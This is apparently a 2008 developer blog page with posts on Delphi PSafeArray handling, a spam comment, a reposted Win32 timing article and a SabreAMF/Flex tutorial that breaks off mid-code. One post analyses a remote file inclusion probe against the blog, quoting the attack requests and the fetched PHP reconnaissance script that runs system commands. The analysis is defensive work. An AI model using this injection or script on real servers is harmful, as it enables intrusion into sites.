The mysteries of PSafeArray

I use Delphi 7 for all my Windows projects: nice, simple, clean, easily maintainable AND Pascal. However, once you find yourself lost in COM and automation, strange variable types suddenly appear, like varArray, OleVariant, upper/lower bounds and PSafeArray, and it gets worse: their initialization and finalization no longer use Object.Free, Dispose() and the like! As far as I can understand, it's all about marshalling: the process of converting variables to COM variables and back.

PSafeArray is defined in ActiveX.pas:

  PSafeArray = ^TSafeArray;
  {$EXTERNALSYM tagSAFEARRAY}
  tagSAFEARRAY = record
    cDims: Word;
    fFeatures: Word;
    cbElements: Longint;
    cLocks: Longint;
    pvData: Pointer;
    rgsabound: array[0..0] of TSafeArrayBound;
  end;
  TSafeArray = tagSAFEARRAY;
  {$EXTERNALSYM SAFEARRAY}
  SAFEARRAY = TSafeArray;

Instantiate and free PSafeArray directly:

var
  Bounds: array[0..0] of TSafeArrayBound;
  SafeArray: PSafeArray;
begin
  Bounds[0].lLbound   := 0;
  Bounds[0].cElements := 100;
  SafeArray := SafeArrayCreate(VT_I1, 1, Bounds);
  SafeArrayDestroy(SafeArray);
end;

Typecast and multidimensional example:

var
  Data: Variant;
  SafeArray: PSafeArray;
begin
  Data      := VarArrayCreate([0, 1, 0, 2], VT_VARIANT);
  Data[0,0] := 1;
  Data[0,1] := 'some text';
  Data[0,2] := Now();
  Data[1,0] := 2;
  Data[1,1] := 'more text';
  Data[1,2] := Now();
  SafeArray := PSafeArray(TVarData(Data).VArray);
end;

To sum it up, I've created an example in which a good ole Pascal array is converted into a varArray, which in turn is converted to a PSafeArray and back again to plain Pascal:

procedure SMA(InData: TArrayOfDouble; Period: Integer; var OutData: TArrayOfDouble);
var
  psaInMatrix, psaOutMatrix: PSafeArray;
  vaInMatrix: Variant;
  LBound, HBound : Integer;

  I: Integer;
  InDataLength: Integer;
  D: Double;
begin
  //create varArray
  InDataLength := Length(InData);
  vaInMatrix := VarArrayCreate([0, InDataLength-1], varDouble);

  //copy data into varArray
  for I := 0 to InDataLength-1 do
    vaInMatrix[I] := InData[I];

  //typecast magic
  psaInMatrix := PSafeArray(TVarData(vaInMatrix).VArray);

  //COM call with a PSafeArray as return value
  psaOutMatrix := COM.SimpleMovingAverage(psaInMatrix, Period);

  //enum PSafeArray
  SafeArrayGetLBound(psaOutMatrix, 1, LBound);
  SafeArrayGetUBound(psaOutMatrix, 1, HBound);

  //copy data
  SetLength(OutData, HBound+1);
  for I := LBound to HBound do
  begin
    SafeArrayGetElement(psaOutMatrix, I, D);
    OutData[I] := D;
  end;

  //cleanup varArray
  VarClear(vaInMatrix);

  //cleanup PSafeArray
  SafeArrayDestroy(psaOutMatrix);
end;

This function can be called in the following way:

type
  TArrayOfDouble = array of Double;
var
  InData, OutData: TArrayOfDouble;
begin
  SetLength(InData, 9);
  InData[0] := 2.48;
  InData[1] := 2.54;
  InData[2] := 2.56;
  InData[3] := 2.48;
  InData[4] := 2.54;
  InData[5] := 2.56;
  InData[6] := 2.48;
  InData[7] := 2.54;
  InData[8] := 2.56;

  SMA(InData, 3, OutData);
end;

Last but not least, to enumerate a varArray use something like this:

for I := VarArrayLowBound(vaInMatrix, 1) to VarArrayHighBound(vaInMatrix, 1) do
  Memo1.Lines.Add(FloatToStr( vaInMatrix[I] ));

FloatToStr is needed here because the varArray was created with varDouble.


July 20th, 2008 - Posted in delphi | | 1 Comments

Please moderate

This blog has now been up for a good three months and today I received the first spam message. I´ve heard about the concept of spamming through forms but never cared… until today:

[Thingies] Please moderate: "Working with SabreAMF and Flex 3 using class mapping"
Author : auto insurance (IP: 90.153.128.11 , 90.153.128.11)
E-mail : d90s_test902@hotmail.com
URL    : http://urlser.com/?m6c0v#0
Whois  : http://ws.arin.net/cgi-bin/whois.pl?queryinput=90.153.128.11
Comment:
2ykl1df-kh7u3ft-tw6q3ff2-0 http://urlser.com/?qbKvI#1
<a href="http://urlser.com/?DYEVZ#2" rel="nofollow">insurance quotes</a>
[url=http://urlser.com/?m6c0v#3]auto insurance[/url]
[url]http://urlser.com/?3kTmj#4[/url]
[http://black-jack-mo.lookera.net#5 black jack]
"cheap auto insurance":http://urlser.com/?nm4rK#6
[LINK http://online-poker-mo.lookera.net#7]online poker[/LINK]
[img]http://victor.freewebhostingpro.com/1.php[/img]

Here's my dilemma: I could throw in a captcha to distinguish between a spamming bot and an enthusiastic reader/poster, but it greatly reduces usability. Personally, that is exactly the reason I decline to respond on other sites, 'cause I don't like to create an account for everything.

Furthermore I strongly believe in “security through obscurity”, so let´s see what can be done here.

tbc

July 19th, 2008 - Posted in wp anti spam | | 0 Comments

Timing in Win32

Original text by Ryan M. Geiss
Check out his other stuff too.. the guy has been busy ;)

Results of some quick research on timing in Win32
by Ryan Geiss - 16 August 2002 (...with updates since then)

You might be thinking to yourself: this is a pretty simple thing
to be posting; what's the big deal?  The deal is that somehow,
good timing code has eluded me for years.  Finally, frustrated,
I dug in and did some formal experiments on a few different computers,
testing the timing precision they could offer, using various win32
functions.  I was fairly surprised by the results!

I tested on three computers; here are their specs:

    Gemini:   933 mhz desktop, win2k
    Vaio:     333 mhz laptop,  win98
    HP:       733 mhz laptop,  win2k

Also, abbreviations to be used hereafter:

    ms: milliseconds, or 1/1,000 of a second
    us: microseconds, or 1/1,000,000 of a second

timeGetTime - what they don't tell you 

First, I tried to determine the precision of timeGetTime().
In order to do this, I simply ran a loop, constantly polling
timeGetTime() until the time changed, and then printing the
delta (between the prev. time and the new time).  I then looked
at the output, and for each computer, took the minimum of all
the deltas that occurred.  (Usually, the minimum was very solid,
occurring about 90% of the time.)  The results:

              Resolution of timeGetTime()
    Gemini:   10 ms
    Vaio:     1 ms
    HP:       10 ms

For now, I am assuming that it was the OS kernel that made the
difference: win2k offers a max. precision of 10 ms for timeGetTime(),
while win98 is much better, at 1 ms.  I assume that WinXP would also
have a precision of 10 ms, and that Win95 would be ~1 ms, like Win98.
(If anyone tests this out, please let me know either way!)

(Note that using timeGetTime() unfortunately requires linking to
winmm.lib, which slightly increases your file size.  You could use
GetTickCount() instead, which doesn't require linking to winmm.lib,
but it tends to not have as good of a timer resolution... so I would
recommend sticking with timeGetTime().)

Next, I tested Sleep().  A while back I noticed that when you call
Sleep(1), it doesn't really sleep for 1 ms; it usually sleeps for longer
than that.  I verified this by calling Sleep(1) ten times in a row,
and taking the difference in timeGetTime() readings from the beginning
to the end.  Whatever delta there was for these ten sleeps, I just divided
it by 10 to get the average duration of Sleep(1).  This turned out to be:

              Average duration of Sleep(1)
    Gemini:   10 ms  (10 calls to Sleep(1) took exactly 100 ms)
    Vaio:     ~4 ms  (10 calls to Sleep(1) took 35-45 ms)
    HP:       10 ms  (10 calls to Sleep(1) took exactly 100 ms)

Now, this was disturbing, because it meant that if you call Sleep(1)
and Sleep(9) on a win2k machine, there is no difference - it still
sleeps for 10 ms!  "So *this* is the reason all my timing code sucks,"
I sighed to myself.

Given that, I decided to give up on Sleep() and timeGetTime().  The
application I was working on required really good fps limiting, and
10ms Sleeps were not precise enough to do a good job.  So I looked
elsewhere.

UPDATE: Matthijs de Boer points out that the timeGetTime function
returns a DWORD value, which will wrap around to 0 every 2^32
milliseconds, which is about 49.71 days, so you should write your
code to be aware of this possibility.
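
A minimal sketch of wrap-safe arithmetic, assuming the two readings are less
than 2^32 ms apart.  The helper name elapsed_ms is hypothetical; a DWORD is a
32-bit unsigned integer, modelled here with std::uint32_t, and on Windows the
two inputs would be timeGetTime() readings.  Unsigned subtraction is done
modulo 2^32, so the difference stays correct across the wrap:

```cpp
#include <cstdint>

// Hypothetical helper: elapsed milliseconds between two 32-bit tick readings.
// Unsigned subtraction wraps modulo 2^32, so the result is still correct when
// 'now' has wrapped past zero, provided the true gap is under ~49.7 days.
std::uint32_t elapsed_ms(std::uint32_t earlier, std::uint32_t now)
{
    return now - earlier;
}
```

The thing to avoid is comparing raw readings directly (for example
"now > deadline"), which gives the wrong answer right around the wrap;
comparing elapsed_ms(start, now) against the wanted duration does not.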

timeBeginPeriod / timeEndPeriod

HOWEVER, I should not have given up so fast!  It turns out that there
is a win32 command, timeBeginPeriod(), which solves our problem:
it lowers the granularity of Sleep() to whatever parameter you give it.
So if you're on windows 2000 and you call timeBeginPeriod(1) and then
Sleep(1), it will truly sleep for just 1 millisecond, rather than the
default 10!

timeBeginPeriod() only affects the granularity of Sleep() for the application
that calls it, so don't worry about messing up the system with it.  Also,
be sure you call timeEndPeriod() when your program exits, with the same
parameter you fed into timeBeginPeriod() when your program started (presumably
1).  Both of these functions are in winmm.lib, so you'll have to link to it
if you want to lower your Sleep() granularity down to 1 ms.

How reliable is it?  I have yet to find a system for which timeBeginPeriod(1)
does not drop the granularity of Sleep(1) to 1 or, at most, 2 milliseconds.
If anyone out there does, please let me know;
I'd like to hear about it, and I will post a warning here.

Note also that calling timeBeginPeriod() also affects the granularity of some
other timing calls, such as CreateWaitableTimer() and WaitForSingleObject();
however, some functions are still unaffected, such as _ftime().  (Special
thanks to Mark Epstein for pointing this out to me!)

some convenient test code

The following code will tell you:
    1. what the granularity, or minimum resolution, of calls to timeGetTime() is,
on your system.  In other words, if you sit in a tight loop and call timeGetTime(),
only noting when the value returned changes, what value do you get?  This
granularity tells you, more or less, what kind of potential error to expect in
the result when calling timeGetTime().
    2. it also tests how long your machine really sleeps when you call Sleep(1).
Often this is actually 2 or more milliseconds, so be careful!

NOTE that these tests are performed after calling timeBeginPeriod(1), so if
you forget to call timeBeginPeriod(1) in your own init code, you might not get
as good of granularity as you see from this test!

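        #include        <stdio.h>
        #include        "windows.h"     // link with winmm.lib

        int main(int argc, char **argv)
        {
            const int count = 64;

            timeBeginPeriod(1);

            printf("1. testing granularity of timeGetTime()...\n");
            int its = 0;
            long cur = 0, last = timeGetTime();
            while (its < count) {
                cur = timeGetTime();
                if (cur != last) {
                    // print each change in the timer value
                    printf("%ld ", cur-last);
                    last = cur;
                    its++;
                }
            }

            printf("\n\n2. testing granularity of Sleep(1)...\n  ");
            long first = timeGetTime();
            cur = first;
            last = first;
            for (int n=0; n<count; n++) {
                // print how long each Sleep(1) really took
                Sleep(1);
                cur = timeGetTime();
                printf("%ld ", cur-last);
                last = cur;
            }
            printf("\n");

            timeEndPeriod(1);
            return 0;
        }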

              Result of GetPentiumClockEstimateFromRegistry()
    Gemini:   975,175,680 Hz
    Vaio:     FAILED.
    HP:       573,571,072 Hz   <-- strange...

              Empirical tests: RDTSC delta after Sleep(1000)
    Gemini:   931,440,000 Hz
    Vaio:     331,500,000 Hz
    HP:        13,401,287 Hz

However, as you can see, this failed on Vaio (the win98 laptop).
Worse yet, however, is that on the HP, the value in the registry
does not match the MHz rating of the machine (733).  That would
be okay if the value was actually the rate at which the timer
ticked; but, after doing some empirical testing, it turns out that
the HP's timer frequency is really 13 MHz.  Trusting the
registry reading on the HP would be a big, big mistake!

So, one conclusion is: don't try to read the registry to get the
timer frequency; you're asking for trouble.  Instead, do it yourself.

Just call Sleep(1000) to allow 1 second (plus or minus ~1%) to pass,
calling GetPentiumTimeRaw() (below) at the beginning and end, and then
simply subtract the two unsigned __int64's, and voila, you now know
the frequency of the timer that feeds RDTSC on the current system.
(*watch out for timer wraps during that 1 second, though...)

Note that you could easily do this in the background, though, using
timeGetTime() instead of Sleep(), so there wouldn't be a 1-second pause
when your program starts.
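
The calibration arithmetic can be sketched as below, assuming you have two raw
counter readings plus the measured wall-clock gap between them in milliseconds
(for example, a difference of two timeGetTime() values).  The function name
estimate_frequency_hz is hypothetical, and the code is only an illustration of
the arithmetic, not a drop-in replacement for the routines in this article:

```cpp
#include <cstdint>

// Hypothetical helper: estimate counter ticks per second from two raw counter
// readings and the wall-clock time (in ms) that passed between them.
// Returns 0 if no time has passed yet.
std::uint64_t estimate_frequency_hz(std::uint64_t start_ticks,
                                    std::uint64_t end_ticks,
                                    std::uint32_t elapsed_ms)
{
    if (elapsed_ms == 0)
        return 0;
    // Unsigned subtraction is modulo 2^64, so one counter wrap is tolerated.
    const std::uint64_t delta = end_ticks - start_ticks;
    // Assumes delta * 1000 fits in 64 bits, which holds for measurement
    // windows of a few seconds at GHz-range tick rates.
    return delta * 1000 / elapsed_ms;
}
```

Because the elapsed time is passed in rather than assumed to be exactly 1000
ms, the same helper works whether the gap came from a Sleep(1000) or from a
background measurement that happened to span, say, 1010 ms.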

        int GetPentiumTimeRaw(unsigned __int64 *ret)
        {
            // returns 0 on failure, 1 on success
            // warning: watch out for wraparound!

            // get high-precision time:
            __try
            {
                unsigned __int64 *dest = (unsigned __int64 *)ret;
                __asm
                {
                    _emit 0xf        // these two bytes form the 'rdtsc' asm instruction,
                    _emit 0x31       //  available on Pentium I and later.
                    mov esi, dest
                    mov [esi  ], eax    // lower 32 bits of tsc
                    mov [esi+4], edx    // upper 32 bits of tsc
                }
                return 1;
            }
            __except(EXCEPTION_EXECUTE_HANDLER)
            {
                return 0;
            }

            return 0;
        }

Once you figure out the frequency, using this 1-second test, you can now
translate readings from the cpu's timestamp counter directly into a real
'time' reading, in seconds:

        double GetPentiumTimeAsDouble(unsigned __int64 frequency)
        {
            // returns < 0 on failure; otherwise, returns current cpu time, in seconds.
            // warning: watch out for wraparound!

            if (frequency==0)
                return -1.0;

            // get high-precision time:
            __try
            {
                unsigned __int64 high_perf_time;
                unsigned __int64 *dest = &high_perf_time;
                __asm
                {
                    _emit 0xf        // these two bytes form the 'rdtsc' asm instruction,
                    _emit 0x31       //  available on Pentium I and later.
                    mov esi, dest
                    mov [esi  ], eax    // lower 32 bits of tsc
                    mov [esi+4], edx    // upper 32 bits of tsc
                }
                __int64 time_s     = (__int64)(high_perf_time / frequency);  // unsigned->sign conversion should be safe here
                __int64 time_fract = (__int64)(high_perf_time % frequency);  // unsigned->sign conversion should be safe here
                // note: here, we wrap the timer more frequently (once per week)
                // than it otherwise would (VERY RARELY - once every 585 years on
                // a 1 GHz), to alleviate floating-point precision errors that start
                // to occur when you get to very high counter values.
                double ret = (time_s % (60*60*24*7)) + (double)time_fract/(double)((__int64)frequency);
                return ret;
            }
            __except(EXCEPTION_EXECUTE_HANDLER)
            {
                return -1.0;
            }

            return -1.0;
        }

This works pretty well, works on ALL Pentium I and later processors, and offers
AMAZING precision.  However, it can be messy, especially working that 1-second
test in there with all your other code, so that it runs in the background.

UPDATE: Ross Bencina was kind enough to point out to me that rdtsc “is a per-cpu
operation, so on multiprocessor systems you have to be careful that multiple calls
to rdtsc are actually executing on the same cpu.”  (You can do that using the
SetThreadAffinityMask() function.)  Thanks Ross!

QueryPerformanceFrequency & QueryPerformanceCounter: Nice

There is one more item in our bag of tricks.  It is simple, elegant, and as far
as I can tell, extremely accurate and reliable.  It is a pair of win32 functions:
QueryPerformanceFrequency and QueryPerformanceCounter.

QueryPerformanceFrequency returns the amount that the counter will increment over
1 second; QueryPerformanceCounter returns a LARGE_INTEGER (a 64-bit *signed* integer)
that is the current value of the counter.  
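
To turn two counter readings into a duration, you divide their difference by
the frequency.  Here is a minimal sketch of that conversion; the name
ticks_to_us is hypothetical, and on Windows delta_ticks would be the difference
of two QueryPerformanceCounter() QuadPart values and freq_hz the QuadPart
filled in by QueryPerformanceFrequency():

```cpp
#include <cstdint>

// Hypothetical helper: convert a counter delta into microseconds, given the
// counter frequency in ticks per second.  Whole seconds and the remainder are
// converted separately so the multiplication by 1,000,000 stays small.
// Returns -1 for an invalid (non-positive) frequency.
std::int64_t ticks_to_us(std::int64_t delta_ticks, std::int64_t freq_hz)
{
    if (freq_hz <= 0)
        return -1;
    const std::int64_t whole = delta_ticks / freq_hz;  // full seconds
    const std::int64_t rest  = delta_ticks % freq_hz;  // leftover ticks
    return whole * 1000000 + (rest * 1000000) / freq_hz;
}
```

With a frequency of 3,579,545 Hz, for example, a delta of 3,579,545 ticks
comes out as 1,000,000 us, i.e. exactly one second.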

Perhaps I am lucky, but it works flawlessly on my 3 machines.  The MSDN library
says that it should work on Windows 95 and later.  

Here are some results:

              Return value of QueryPerformanceFrequency
    Gemini:   3,579,545 Hz
    Vaio:     1,193,000 Hz
    HP:       3,579,545 Hz

              Maximum # of unique readings I could get in 1 second
    Gemini:   658,000  (-> 1.52 us resolution!)
    Vaio:     174,300  (-> 5.73 us resolution!)
    HP:       617,000  (-> 1.62 us resolution!)

I was pretty excited to see timing resolutions in the low-microsecond
range.  Note that for the latter test, I avoided printing any text
during the 1-second interval, as it would drastically affect the outcome.

Now, here is my question to you: do these two functions work for you?
What OS does the computer run, what is the MHz rating, and is it a laptop
or desktop?  What was the result of QueryPerformanceFrequency?
What was the max. # of unique readings you could get in 1 second?
Can you find any computers that it doesn’t work on?  Let me know, and
I’ll collect & publish everyone’s results here.

So, until I find some computers that QueryPerformanceFrequency &
QueryPerformanceCounter don’t work on, I’m sticking with them.  If they fail,
I’ve got backup code that will kick in, which uses timeGetTime(); I didn’t
bother to use RDTSC because of the calibration issue, and I’m hopeful that
these two functions are highly reliable.  I suppose only feedback from
readers like you will tell… =)

UPDATE: a few people have written e-mail pointing me to this Microsoft Knowledge
Base article which outlines some cases in which the QueryPerformanceCounter
function can unexpectedly jump forward by a few seconds.

UPDATE: Matthijs de Boer points out that you can use the SetThreadAffinityMask()
function to make your thread stick to one core or the other, so that ‘rdtsc’ and
QueryPerformanceCounter() don’t have timing issues in dual core systems.

Accurate FPS Limiting / High-precision ‘Sleeps’

So now, when I need to do FPS limiting (limiting the framerate to some
maximum), I don’t just naively call Sleep() anymore.  Instead, I use
QueryPerformanceCounter in a loop that runs Sleep(0).  Sleep(0) simply
gives up your thread’s current timeslice to another waiting thread; it
doesn’t really sleep at all.  So, if you just keep calling Sleep(0)
in a loop until QueryPerformanceCounter() says you’ve hit the right time,
you’ll get ultra-accurate FPS readings.

There is one problem with this kind of fps limiting: it will use up
100% of the CPU.  Even though the computer WILL remain
quite responsive, because the app sucking up the idle time is being very
“nice”, this will still look very bad on the CPU meter (which will stay
at 100%) and, much worse, it will drain the battery quite quickly on
laptops.  

To get around this, I use a hybrid algorithm that uses Sleep() to do the
bulk of the waiting, and QueryPerformanceCounter() to do the finishing
touches, making it accurate to ~10 microseconds, but still wasting very
little processor.

My code for accurate FPS limiting looks something like this, and runs
at the end of each frame, immediately after the page flip:

        // note: BE SURE YOU CALL timeBeginPeriod(1) at program startup!!!
        // note: BE SURE YOU CALL timeEndPeriod(1) at program exit!!!
        // note: that will require linking to winmm.lib
        // note: never use static initializers (like this) with Winamp plug-ins!
        // note: m_high_perf_timer_freq is assumed to have been filled in once,
        //       at startup, by QueryPerformanceFrequency().
        static LARGE_INTEGER m_prev_end_of_frame = {0};
        int max_fps = 60;

        LARGE_INTEGER t;
        QueryPerformanceCounter(&t);

        if (m_prev_end_of_frame.QuadPart != 0)
        {
            int ticks_to_wait = (int)m_high_perf_timer_freq.QuadPart / max_fps;
            int done = 0;
            do
            {
                QueryPerformanceCounter(&t);

                int ticks_passed = (int)((__int64)t.QuadPart - (__int64)m_prev_end_of_frame.QuadPart);
                int ticks_left = ticks_to_wait - ticks_passed;

                if (t.QuadPart < m_prev_end_of_frame.QuadPart)    // time wrap
                    done = 1;
                if (ticks_passed >= ticks_to_wait)
                    done = 1;

                if (!done)
                {
                    // if > 0.002s left, do Sleep(1), which will actually sleep some
                    //   steady amount, probably 1-2 ms,
                    //   and do so in a nice way (cpu meter drops; laptop battery spared).
                    // otherwise, do a few Sleep(0)’s, which just give up the timeslice,
                    //   but don’t really save cpu or battery, but do pass a tiny
                    //   amount of time.
                    if (ticks_left > (int)m_high_perf_timer_freq.QuadPart*2/1000)
                        Sleep(1);
                    else
                        for (int i=0; i<10; i++)
                            Sleep(0);  // causes thread to give up its timeslice
                }
            }
            while (!done);
        }

        m_prev_end_of_frame = t;

...which is trivial to convert into a high-precision Sleep() function.
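
As an illustration only, the same hybrid idea can be sketched portably with the
C++ standard library.  This is an analogue under assumptions, not the Win32
code from this article: std::chrono::steady_clock stands in for
QueryPerformanceCounter(), std::this_thread::sleep_for() for Sleep(1), and
std::this_thread::yield() for Sleep(0).  The name precise_sleep is
hypothetical.

```cpp
#include <chrono>
#include <thread>

// Hypothetical portable analogue of the hybrid wait: sleep in ~1 ms steps
// while more than 2 ms remain, then give up the timeslice in a loop until the
// deadline has passed.
void precise_sleep(std::chrono::microseconds duration)
{
    using clock = std::chrono::steady_clock;
    const clock::time_point deadline = clock::now() + duration;

    for (;;) {
        const clock::duration left = deadline - clock::now();
        if (left <= clock::duration::zero())
            break;                                   // deadline reached
        if (left > std::chrono::milliseconds(2))
            std::this_thread::sleep_for(std::chrono::milliseconds(1));
        else
            std::this_thread::yield();               // finishing touches
    }
}
```

A frame limiter would call something like
precise_sleep(std::chrono::microseconds(16667)) minus the time the frame
already took.  How close the 1 ms sleeps get to 1 ms still depends on the
operating system's timer granularity.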

Conclusions & Summary 

Using regular old timeGetTime() to do timing is not reliable on many Windows-based
operating systems because the granularity of the system timer can be as high as 10-15
milliseconds, meaning that timeGetTime() is only accurate to 10-15 milliseconds.
[Note that the high granularities occur on NT-based operating systems like Windows NT,
2000, and XP.  Windows 95 and 98 tend to have much better granularity, around 1-5 ms.]

However, if you call timeBeginPeriod(1) at the beginning of your program (and
timeEndPeriod(1) at the end), timeGetTime() will usually become accurate to 1-2
milliseconds, and will provide you with extremely accurate timing information.

Sleep() behaves similarly; the length of time that Sleep() actually sleeps for
goes hand-in-hand with the granularity of timeGetTime(), so after calling
timeBeginPeriod(1) once, Sleep(1) will actually sleep for 1-2 milliseconds, Sleep(2)
for 2-3, and so on (instead of sleeping in increments as high as 10-15 ms).

For higher precision timing (sub-millisecond accuracy), you'll probably want to avoid
using the assembly mnemonic RDTSC because it is hard to calibrate; instead, use
QueryPerformanceFrequency and QueryPerformanceCounter, which are accurate to less
than 10 microseconds (0.00001 seconds).  

For simple timing, both timeGetTime and QueryPerformanceCounter work well, and
QueryPerformanceCounter is obviously more accurate.  However, if you need to do
any kind of "timed pauses" (such as those necessary for framerate limiting), you
need to be careful of sitting in a loop calling QueryPerformanceCounter, waiting
for it to reach a certain value; this will eat up 100% of your processor.  Instead,
consider a hybrid scheme, where you call Sleep(1) (don't forget timeBeginPeriod(1)
first!) whenever you need to pass more than 1 ms of time, and then only enter the
QueryPerformanceCounter 100%-busy loop to finish off the last < 1/1000th of a
second of the delay you need.  This will give you ultra-accurate delays (accurate
to 10 microseconds), with very minimal CPU usage.  See the code above.

Please Note: Several people have written me over the years, offering additions
or new developments since I first wrote this article, and I've added 'update'
comments here and there.  The general text of the article DOES NOT reflect the
'UPDATE' comments yet, so please keep that in mind, if you see any contradictions.

UPDATE: Matthijs de Boer points out that you should watch out for variable CPU speeds,
in general, when running on laptops or other power-conserving (perhaps even just
eco-friendly) devices.  (Thanks Matthijs!)

This document copyright (c)2002+ Ryan M. Geiss.

July 14th, 2008 - Posted in thingies | | 0 Comments

Airtight Interactive


Cube Wall from Felix Turner.

July 14th, 2008 - Posted in just cool stuff | | 0 Comments

Wordpress hack

One day I felt the need for some visitor insight on this blog. From the immense list of available plugins I chose StatPress. Very nice, and all kinds of nice-to-knows popped up in the admin. Among them were three entries like:

July 10, 2008	02:06:36	218.38.18.31	_SERVER[SCRIPT_FILENAME]=http:...	Windows 2000

Mmm, probably a script kiddie with too much time on his hands. However, this needs more investigation … in my logs I found the complete requests:

218.38.18.31 - - [10/Jul/2008:02:06:33 +0200] "GET /2008/07/multiple-unlimited-php-versions-on-an-single-debian-apache-server/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 9638 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:34 +0200] "GET /?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 54974 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:35 +0200] "GET /2008/07/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 18301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

OK, StatPress is accurate about that :) For those who don't know: Windows 2000 is actually NT 5.0; after all, it's the successor of Windows NT (New Technology) 4.0, which in turn succeeded Windows NT 3.51, and so on. So Windows Server 2003 is basically NT 5.2.. I wonder what Windows Server 2008 is called….

Anyway, a GET request with altervista.org/id.txt dumped in ?_SERVER[SCRIPT_FILENAME] … if I'm correct, a PHP server should parse this as $_SERVER[SCRIPT_FILENAME], generating a warning or notice complaining about an assumed constant SCRIPT_FILENAME, which will then be set to altervista.org/id.txt?.. and supposedly this id.txt thingie gets included and parsed?? That is, if register_globals is set… right??
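
To spot requests like these in a log, a simple check on the query string is
enough.  Below is a minimal sketch; the function name targets_superglobal and
the list of names are my own assumptions, and it only looks at raw,
non-URL-encoded query strings (an encoded variant such as _SERVER%5B is not
caught):

```cpp
#include <cstring>
#include <string>

// Hypothetical check: does a raw query string contain a parameter whose NAME
// targets a PHP superglobal, e.g. "_SERVER[SCRIPT_FILENAME]=..."?
// Assumption: the query string is not URL-encoded.
bool targets_superglobal(const std::string& query)
{
    static const char* const names[] = {
        "_SERVER[", "_GET[", "_POST[", "_COOKIE[", "_FILES[",
        "_ENV[", "_REQUEST[", "_SESSION[", "GLOBALS["
    };

    std::string::size_type start = 0;
    while (start <= query.size()) {
        // Parameters are separated by '&'; 'start' is where a name begins.
        std::string::size_type end = query.find('&', start);
        if (end == std::string::npos)
            end = query.size();
        for (const char* name : names) {
            if (query.compare(start, std::strlen(name), name) == 0)
                return true;
        }
        start = end + 1;
    }
    return false;
}
```

Fed with the part after the "?" of the three requests above, this returns true
for each of them, while an ordinary query string such as "p=12&page=2" passes.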

Let´s get this file with lynx http://test12356.altervista.org/id.txt?

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }

        return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kungkang";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "kungkang was here ..";
echo "uname -a: $un";
echo "os: $os";
echo "uptime: $up";
echo "id: $id1";
echo "pwd: $pwd1";
echo "php: $php1";
echo "software: $sof1";
echo "server-name: $name1";
echo "server-ip: $ip1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;

Looks like a real phpinfo() ;) It doesn't look too harmful, but WordPress and Joomla should both be targets.. It looks outdated as well, 'cause I couldn't get this thing to work, even with globals registered. The output it should have generated:

kungkang
304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21 uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis) kungkang was here ..
uname -a: Fedora blog.virtec.org 2.2.18-5-%86-bigmem #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686
os: Linux
uptime: 304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21
id: uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis)
pwd: /var/htdocs/www/publish_http/
php: 5.0.6-0.FC.3
software: Apache
server-name: blog.virtec.org
server-ip:
free: 346128.63 Gb
used: 16342.80 Gb
total: 234591.44 Gb

This guy seems to be from Indonesia and has a nice tag on http://www.strenna online.com/. I'd advise you to disable JavaScript before visiting.. however, you won't be able to view his animation then.

More information: whois strenna online.com

There are a million ways to inject everything into anything… and it will always be that way. If you're looking for some protection, check out:

http://www.modsecurity.org/
ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.

http://www.phpwact.org/security/attack/catalog?s=script%20filename%20injection
A Catalog of Security Attacks: methods of attacking a web application from the attacker's perspective, and how to prevent each attack from the application developer's perspective.

July 10th, 2008 - Posted in thingies | | 2 Comments

Working with SabreAMF and Flex 3 using class mapping

After reading a few good articles (see list below) about using SabreAMF 1.x with Flex 2/3, my questions still remained unanswered. I've used AMFPHP and saw the possibilities of class mapping: it gives nice code clarity, despite the cost of dual implementation or (de)serialization differences. Very useful when building large/critical applications with different programmers and designers. BlazeDS seems interesting too, but the only thing I know about Jafa is how to spell it…including Phyton.

You'll find a mountain of information comparing the pros and cons of the different AMF implementations for PHP, however without solutions. In my humble opinion AMFPHP is, for now, useful for projects with an emphasis on the frontend and limited backend support. I'm looking for large OO structures and freedom of code with a less intrusive AMF/PHP framework, so SabreAMF sounds promising…

Unfortunately I couldn't find any suitable tutorials or examples, and even failed over to www.metacrawler.com. Anyway, let's get down to it!

We need to take the following steps and afterwards we have an example:

    Setup the php classes
    Setup an interfacing class
    Setup the flex classes
    Setup an amf gateway

php classes
In this simple real-life situation I want to map three classes to and from Flex: they are used to manage users [CUser] within a group [CGroup], with the users stored in the group's members [CCollection] property. Indeed, multiple groups could be stored in a collection as well, but I leave that as homework :)

CObjects.php

class CUser extends CObject {

    public $id;
    public $username;

    public function __construct() {
        $this->id        = 0;
        $this->username  = "[user]";
    }

}

class CGroup extends CObject {

    public $id;
    public $name;
    public $members;

    public function __construct() {
        $this->id       = 0;
        $this->name     = "[group]";
        $this->members  = new CCollection();
    }

}

class CCollection extends SabreAMF_ArrayCollection {
